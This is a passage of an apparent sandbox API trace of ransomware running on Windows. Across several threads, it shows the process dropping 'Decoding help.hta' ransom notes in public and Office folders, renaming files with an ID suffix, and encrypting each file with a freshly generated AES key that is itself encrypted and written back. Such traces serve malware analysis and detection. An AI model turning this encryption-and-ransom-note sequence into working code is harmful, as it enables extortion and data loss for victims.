1 [0048.852] CloseHandle (hObject=0x428) returned 1 [0048.853] CryptDestroyKey (hKey=0x5d8790) returned 1 [0048.853] CryptReleaseContext (hProv=0x3449710, dwFlags=0x0) returned 1 [0048.853] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.853] WriteFile (in: hFile=0x424, lpBuffer=0x11edfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x11edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x11edfbe4*, lpNumberOfBytesWritten=0x11edfcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.862] WriteFile (in: hFile=0x424, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x11edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x11edfcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.651] CloseHandle (hObject=0x424) returned 1 [0051.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.292] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x11edfd30 | out: lpFindFileData=0x11edfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0055.293] lstrcmpW (lpString1=".", lpString2="Sample Music") returned -1 [0055.293] lstrcmpW (lpString1="..", lpString2="Sample Music") returned -1 [0055.293] lstrcmpiW (lpString1="windows", lpString2="Sample Music") returned 1 [0055.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\*.*" [0055.293] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned 29 [0055.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\", lpString2="Sample Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" [0055.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*.*" [0055.293] GlobalMemoryStatus (in: lpBuffer=0x11edfd10 | out: lpBuffer=0x11edfd10) [0055.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1119bc20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x828 [0055.758] CloseHandle (hObject=0x828) returned 1 [0055.758] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x11edfd30 | out: lpFindFileData=0x11edfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0055.758] FindClose (in: hFindFile=0x5a5ef0 | out: hFindFile=0x5a5ef0) returned 1 Thread: id = 228 os_tid = 0x5d8 [0040.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*", lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8c10 [0042.187] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.187] FindNextFileW (in: hFindFile=0x5d8c10, lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.187] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.187] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.187] FindNextFileW (in: hFindFile=0x5d8c10, lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0042.187] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0042.187] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0042.188] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" [0042.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\office\\decoding help.hta")) returned 0xffffffff [0042.188] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\office\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0042.257] WriteFile (in: hFile=0x590, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1201fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1201fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.258] CloseHandle (hObject=0x590) returned 1 [0042.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.259] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AssetLibrary.ico") returned 1 [0042.259] lstrlenW (lpString="AssetLibrary.ico") returned 16 [0042.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0042.259] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0042.259] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="AssetLibrary.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" [0042.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" [0042.259] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]" [0042.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b4 [0042.534] CreateFileMappingA (hFile=0x6b4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6b8 [0042.534] CryptAcquireContextA (in: phProv=0x1201fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1201fcec*=0x344a348) returned 1 [0048.969] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x1201fce8 | out: phKey=0x1201fce8*=0x671930) returned 1 [0048.969] CryptExportKey (in: hKey=0x671930, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1201fbe4, pdwDataLen=0x1201fce4 | out: pbData=0x1201fbe4*, pdwDataLen=0x1201fce4*=0x2c) returned 1 [0048.969] MapViewOfFile (hFileMappingObject=0x6b8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1520) returned 0x2d0000 [0048.984] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1201fbe4*, pdwDataLen=0x1201fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1201fbe4*, pdwDataLen=0x1201fcf8*=0x100) returned 1 [0048.984] CryptEncrypt (in: hKey=0x671930, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x1201fce4*=0x1520, dwBufLen=0x1520 | out: pbData=0x2d0000*, pdwDataLen=0x1201fce4*=0x1520) returned 1 [0048.984] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0048.986] CloseHandle (hObject=0x6b8) returned 1 [0048.986] CryptDestroyKey (hKey=0x671930) returned 1 [0048.986] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0048.986] SetFilePointerEx (in: hFile=0x6b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.986] WriteFile (in: hFile=0x6b4, lpBuffer=0x1201fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1201fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1201fbe4*, lpNumberOfBytesWritten=0x1201fcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.015] WriteFile (in: hFile=0x6b4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1201fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1201fcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.015] CloseHandle (hObject=0x6b4) returned 1 [0051.655] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.293] FindNextFileW (in: hFindFile=0x5d8c10, lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0055.293] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0055.293] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0055.293] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" [0055.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\office\\decoding help.hta")) returned 0x1 [0055.294] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DocumentRepository.ico") returned -1 [0055.294] lstrlenW (lpString="DocumentRepository.ico") returned 22 [0055.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0055.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0055.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="DocumentRepository.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" [0055.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" [0055.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]" [0055.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.294] FindNextFileW (in: hFindFile=0x5d8c10, lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0055.294] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0055.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0055.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" [0055.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\office\\decoding help.hta")) returned 0x1 [0055.294] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MySharePoints.ico") returned -1 [0055.294] lstrlenW (lpString="MySharePoints.ico") returned 17 [0055.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*" [0055.294] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*.*") returned 39 [0055.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\", lpString2="MySharePoints.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" [0055.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" [0055.294] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" [0055.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0059.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico")) returned 1 [0063.049] FindNextFileW (in: hFindFile=0x5d8c10, lpFindFileData=0x1201fd30 | out: lpFindFileData=0x1201fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 Thread: id = 229 os_tid = 0x90 [0040.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f30 [0040.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.522] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.522] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.522] FindNextFileW (in: hFindFile=0x5a5f30, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.522] lstrcpyW (in: lpString1=0x5d28600, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" [0040.522] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned 32 [0040.523] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Decoding help.hta" [0040.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\public\\pictures\\decoding help.hta")) returned 0xffffffff [0040.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\public\\pictures\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0040.799] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x394fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x394fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.800] CloseHandle (hObject=0x334) returned 1 [0040.800] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.259] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.259] lstrlenW (lpString="desktop.ini") returned 11 [0041.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*.*" [0041.259] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\*.*") returned 32 [0041.259] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" [0041.259] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" [0041.259] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\pictures\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\pictures\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0041.260] CreateFileMappingA (hFile=0x430, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x434 [0041.260] CryptAcquireContextA (in: phProv=0x394fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x394fcec*=0x3449798) returned 1 [0043.833] CryptGenKey (in: hProv=0x3449798, Algid=0x6610, dwFlags=0x1, phKey=0x394fce8 | out: phKey=0x394fce8*=0x5d87d0) returned 1 [0043.833] CryptExportKey (in: hKey=0x5d87d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x394fbe4, pdwDataLen=0x394fce4 | out: pbData=0x394fbe4*, pdwDataLen=0x394fce4*=0x2c) returned 1 [0043.833] MapViewOfFile (hFileMappingObject=0x434, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 